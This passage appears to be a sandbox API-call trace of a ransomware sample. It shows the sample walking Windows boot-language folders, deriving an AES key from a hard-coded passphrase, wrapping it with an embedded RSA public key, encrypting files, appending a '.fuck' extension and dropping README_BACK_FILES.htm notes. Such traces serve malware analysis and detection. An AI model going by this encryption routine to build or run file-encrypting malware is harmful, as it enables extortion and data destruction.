lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x27ff218 [0139.306] FindNextFileA (in: hFindFile=0x27ff218, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0139.306] FindNextFileA (in: hFindFile=0x27ff218, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0139.306] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0139.306] GetLastError () returned 0x0 [0139.306] GetFileAttributesA (lpFileName="C:\\\\Boot\\lt-LT\\bootmgr.exe.mui" (normalized: "c:\\boot\\lt-lt\\bootmgr.exe.mui")) returned 0x20 [0139.306] SetFileAttributesA (lpFileName="C:\\\\Boot\\lt-LT\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0139.307] CreateFileA (lpFileName="C:\\\\Boot\\lt-LT\\bootmgr.exe.mui" (normalized: "c:\\boot\\lt-lt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0139.307] CreateFileA (lpFileName="C:\\\\Boot\\lt-LT\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\lt-lt\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0139.307] SetFileAttributesA (lpFileName="C:\\\\Boot\\lt-LT\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0139.308] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x2803b30) returned 1 [0139.310] CryptCreateHash (in: hProv=0x2803b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0139.310] lstrlenA (lpString="BklUgDiXcWznHQtJYhpxWlYbzMlQm") returned 29 [0139.310] CryptHashData (hHash=0x27fefd8, pbData=0x5bcf70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0139.310] CryptDeriveKey (in: hProv=0x2803b30, Algid=0x6610, hBaseData=0x27fefd8, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x27ff598) returned 1 [0139.310] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0139.310] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0139.310] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x28044c0) returned 1 [0139.311] CryptImportPublicKeyInfo (in: hCryptProv=0x28044c0, dwCertEncodingType=0x1, pInfo=0x27ff950*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27ff980*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27ff988*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x27ff118) returned 1 [0139.311] CryptEncrypt (in: hKey=0x27ff118, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0139.311] CryptEncrypt (in: hKey=0x27ff118, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28043b0*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x28043b0*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0139.311] WriteFile (in: hFile=0x5d54, lpBuffer=0x28043b0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x28043b0*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0139.312] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2796778, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0139.312] CryptEncrypt (in: hKey=0x27ff598, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0139.312] WriteFile (in: hFile=0x5d54, lpBuffer=0x2796778*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0139.312] CloseHandle (hObject=0xffffffff) returned 1 [0139.312] CloseHandle (hObject=0x5d54) returned 1 [0139.422] CopyFileA (lpExistingFileName="C:\\\\Boot\\lt-LT\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\lt-lt\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\lt-LT\\bootmgr.exe.mui" (normalized: "c:\\boot\\lt-lt\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0139.427] SetFileAttributesA (lpFileName="C:\\\\Boot\\lt-LT\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0139.427] DeleteFileA (lpFileName="C:\\\\Boot\\lt-LT\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\lt-lt\\bootmgr.exe.mui.gsg")) returned 1 [0139.428] MoveFileA (lpExistingFileName="C:\\\\Boot\\lt-LT\\bootmgr.exe.mui" (normalized: "c:\\boot\\lt-lt\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\lt-LT\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\lt-lt\\bootmgr.exe.mui.fuck")) returned 0 [0139.429] CryptDestroyHash (hHash=0x27fefd8) returned 1 [0139.429] CryptDestroyKey (hKey=0x27ff598) returned 1 [0139.429] CryptReleaseContext (hProv=0x2803b30, dwFlags=0x0) returned 1 [0139.429] FindNextFileA (in: hFindFile=0x27ff218, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0 [0139.429] FindClose (in: hFindFile=0x27ff218 | out: hFindFile=0x27ff218) returned 1 [0139.429] GetFileAttributesA (lpFileName="C:\\\\Boot\\lt-LT\\README_BACK_FILES.htm" (normalized: "c:\\boot\\lt-lt\\readme_back_files.htm")) returned 0xffffffff [0139.429] AreFileApisANSI () returned 1 [0139.429] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d280, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0139.429] CreateFileW (lpFileName="C:\\\\Boot\\lt-LT\\README_BACK_FILES.htm" (normalized: "c:\\boot\\lt-lt\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0139.430] GetFileType (hFile=0x5d50) returned 0x1 [0139.430] WriteFile (in: hFile=0x5d50, lpBuffer=0x2c5e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c5e2cc*, lpNumberOfBytesWritten=0x2c5e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0139.431] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0139.431] FindFirstFileA (in: lpFileName="C:\\\\Boot\\lv-LV\\*.*", lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x27ff4d8 [0139.432] FindNextFileA (in: hFindFile=0x27ff4d8, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0139.432] FindNextFileA (in: hFindFile=0x27ff4d8, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0139.432] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0139.432] GetLastError () returned 0x0 [0139.432] GetFileAttributesA (lpFileName="C:\\\\Boot\\lv-LV\\bootmgr.exe.mui" (normalized: "c:\\boot\\lv-lv\\bootmgr.exe.mui")) returned 0x20 [0139.432] SetFileAttributesA (lpFileName="C:\\\\Boot\\lv-LV\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0139.432] CreateFileA (lpFileName="C:\\\\Boot\\lv-LV\\bootmgr.exe.mui" (normalized: "c:\\boot\\lv-lv\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0139.433] CreateFileA (lpFileName="C:\\\\Boot\\lv-LV\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\lv-lv\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0139.433] SetFileAttributesA (lpFileName="C:\\\\Boot\\lv-LV\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0139.433] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x2804080) returned 1 [0139.436] CryptCreateHash (in: hProv=0x2804080, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0139.436] lstrlenA (lpString="BklUgDiXcWznHQtJYhpxWlYbzMlQm") returned 29 [0139.436] CryptHashData (hHash=0x27ff058, pbData=0x5bcf98, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0139.436] CryptDeriveKey (in: hProv=0x2804080, Algid=0x6610, hBaseData=0x27ff058, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x27fef98) returned 1 [0139.436] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0139.436] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0139.436] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x2803778) returned 1 [0139.437] CryptImportPublicKeyInfo (in: hCryptProv=0x2803778, dwCertEncodingType=0x1, pInfo=0x2800720*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2800750*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2800758*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x27ff0d8) returned 1 [0139.437] CryptEncrypt (in: hKey=0x27ff0d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0139.437] CryptEncrypt (in: hKey=0x27ff0d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2803800*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x2803800*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0139.437] WriteFile (in: hFile=0x5d54, lpBuffer=0x2803800*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2803800*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0139.438] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2796778, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0139.438] CryptEncrypt (in: hKey=0x27fef98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0139.438] WriteFile (in: hFile=0x5d54, lpBuffer=0x2796778*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0139.438] CloseHandle (hObject=0xffffffff) returned 1 [0139.438] CloseHandle (hObject=0x5d54) returned 1 [0139.439] CopyFileA (lpExistingFileName="C:\\\\Boot\\lv-LV\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\lv-lv\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\lv-LV\\bootmgr.exe.mui" (normalized: "c:\\boot\\lv-lv\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0139.443] SetFileAttributesA (lpFileName="C:\\\\Boot\\lv-LV\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0139.444] DeleteFileA (lpFileName="C:\\\\Boot\\lv-LV\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\lv-lv\\bootmgr.exe.mui.gsg")) returned 1 [0139.445] MoveFileA (lpExistingFileName="C:\\\\Boot\\lv-LV\\bootmgr.exe.mui" (normalized: "c:\\boot\\lv-lv\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\lv-LV\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\lv-lv\\bootmgr.exe.mui.fuck")) returned 0 [0139.445] CryptDestroyHash (hHash=0x27ff058) returned 1 [0139.445] CryptDestroyKey (hKey=0x27fef98) returned 1 [0139.445] CryptReleaseContext (hProv=0x2804080, dwFlags=0x0) returned 1 [0139.445] FindNextFileA (in: hFindFile=0x27ff4d8, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0 [0139.445] FindClose (in: hFindFile=0x27ff4d8 | out: hFindFile=0x27ff4d8) returned 1 [0139.446] GetFileAttributesA (lpFileName="C:\\\\Boot\\lv-LV\\README_BACK_FILES.htm" (normalized: "c:\\boot\\lv-lv\\readme_back_files.htm")) returned 0xffffffff [0139.446] AreFileApisANSI () returned 1 [0139.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0139.446] CreateFileW (lpFileName="C:\\\\Boot\\lv-LV\\README_BACK_FILES.htm" (normalized: "c:\\boot\\lv-lv\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0139.446] GetFileType (hFile=0x5d50) returned 0x1 [0139.446] WriteFile (in: hFile=0x5d50, lpBuffer=0x2c5e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c5e2cc*, lpNumberOfBytesWritten=0x2c5e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0139.447] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0139.447] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0139.448] FindFirstFileA (in: lpFileName="C:\\\\Boot\\nb-NO\\*.*", lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x27ff318 [0139.448] FindNextFileA (in: hFindFile=0x27ff318, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0139.448] FindNextFileA (in: hFindFile=0x27ff318, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0139.448] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0139.448] GetLastError () returned 0x0 [0139.448] GetFileAttributesA (lpFileName="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui")) returned 0x20 [0139.449] SetFileAttributesA (lpFileName="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0139.449] CreateFileA (lpFileName="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0139.449] CreateFileA (lpFileName="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0139.450] SetFileAttributesA (lpFileName="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0139.450] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x2803cc8) returned 1 [0139.452] CryptCreateHash (in: hProv=0x2803cc8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0139.452] lstrlenA (lpString="BklUgDiXcWznHQtJYhpxWlYbzMlQm") returned 29 [0139.452] CryptHashData (hHash=0x27ff358, pbData=0x5bcdb8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0139.452] CryptDeriveKey (in: hProv=0x2803cc8, Algid=0x6610, hBaseData=0x27ff358, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x27ff658) returned 1 [0139.452] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0139.452] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0139.453] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x2804190) returned 1 [0139.453] CryptImportPublicKeyInfo (in: hCryptProv=0x2804190, dwCertEncodingType=0x1, pInfo=0x27ffa20*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27ffa50*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27ffa58*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x27fefd8) returned 1 [0139.453] CryptEncrypt (in: hKey=0x27fefd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0139.453] CryptEncrypt (in: hKey=0x27fefd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2803a20*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x2803a20*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0139.454] WriteFile (in: hFile=0x5d54, lpBuffer=0x2803a20*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2803a20*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0139.455] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2796778, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0139.455] CryptEncrypt (in: hKey=0x27ff658, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0139.455] WriteFile (in: hFile=0x5d54, lpBuffer=0x2796778*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0139.455] CloseHandle (hObject=0xffffffff) returned 1 [0139.455] CloseHandle (hObject=0x5d54) returned 1 [0139.459] CopyFileA (lpExistingFileName="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0139.464] SetFileAttributesA (lpFileName="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0139.464] DeleteFileA (lpFileName="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui.gsg")) returned 1 [0139.465] MoveFileA (lpExistingFileName="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui.fuck")) returned 0 [0139.466] CryptDestroyHash (hHash=0x27ff358) returned 1 [0139.466] CryptDestroyKey (hKey=0x27ff658) returned 1 [0139.466] CryptReleaseContext (hProv=0x2803cc8, dwFlags=0x0) returned 1 [0139.466] FindNextFileA (in: hFindFile=0x27ff318, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0139.466] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0139.466] GetLastError () returned 0x5 [0139.466] GetFileAttributesA (lpFileName="C:\\\\Boot\\nb-NO\\memtest.exe.mui" (normalized: "c:\\boot\\nb-no\\memtest.exe.mui")) returned 0x20 [0139.466] SetFileAttributesA (lpFileName="C:\\\\Boot\\nb-NO\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0139.466] CreateFileA (lpFileName="C:\\\\Boot\\nb-NO\\memtest.exe.mui" (normalized: "c:\\boot\\nb-no\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0139.467] CreateFileA (lpFileName="C:\\\\Boot\\nb-NO\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\nb-no\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0139.467] SetFileAttributesA (lpFileName="C:\\\\Boot\\nb-NO\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0139.467] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x2804438) returned 1 [0139.470] CryptCreateHash (in: hProv=0x2804438, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0139.470] lstrlenA (lpString="BklUgDiXcWznHQtJYhpxWlYbzMlQm") returned 29 [0139.470] CryptHashData (hHash=0x27fef18, pbData=0x5bcf98, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0139.470] CryptDeriveKey (in: hProv=0x2804438, Algid=0x6610, hBaseData=0x27fef18, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x27fef58) returned 1 [0139.470] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0139.470] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0139.470] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x2803888) returned 1 [0139.471] CryptImportPublicKeyInfo (in: hCryptProv=0x2803888, dwCertEncodingType=0x1, pInfo=0x27ff7b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27ff7e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27ff7e8*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x27ff198) returned 1 [0139.471] CryptEncrypt (in: 